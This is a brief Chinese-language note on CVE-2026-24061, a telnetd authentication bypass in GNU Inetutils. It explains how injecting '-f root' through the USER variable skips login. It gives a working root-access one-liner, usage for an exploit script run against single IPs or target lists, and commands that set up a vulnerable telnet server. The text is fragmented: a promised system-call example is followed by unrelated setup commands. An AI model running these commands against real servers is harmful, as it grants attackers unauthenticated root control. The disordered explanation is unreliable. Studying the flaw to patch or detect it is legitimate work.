⚠️ 注意:
CVE-2026-24061GNU Inetutils 是 GNU 项目提供的一套经典网络工具集,其中包含 telnetd 服务,即 Telnet 服务器守护进程。在 1.9.3 至 2.7 版本中,telnetd 服务在用户认证流程中存在致命缺陷。该服务在调用系统登录程序 /usr/bin/login 时,未能对客户端传入的 USER 环境变量进行有效过滤和校验。攻击者可通过设置一个特定的 USER 变量值,将 -f 参数直接注入到 login 命令中。login 程序的 -f 参数用于“跳过二次认证”,这使得攻击者可以完全绕过所有密码验证环节,直接以 root 用户身份建立远程会话,从而获得服务器的最高控制权。该漏洞危害性极高,相当于一个公开的、无需任何凭证的远程root后门
USER='-f root' telnet -a <target_ip>

python3 cve-2026-24061.py -i 10.10.168.128
python3 cve-2026-24061.py -f targets.txt
上述命令将环境变量 USER 设置为 -f root。当存在漏洞的 telnetd 服务接收到连接后,会构造并执行类似以下的系统调用:
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf
sudo systemctl restart openbsd-inetd
sudo ss -tuln | grep ':23'
telnet localhost 23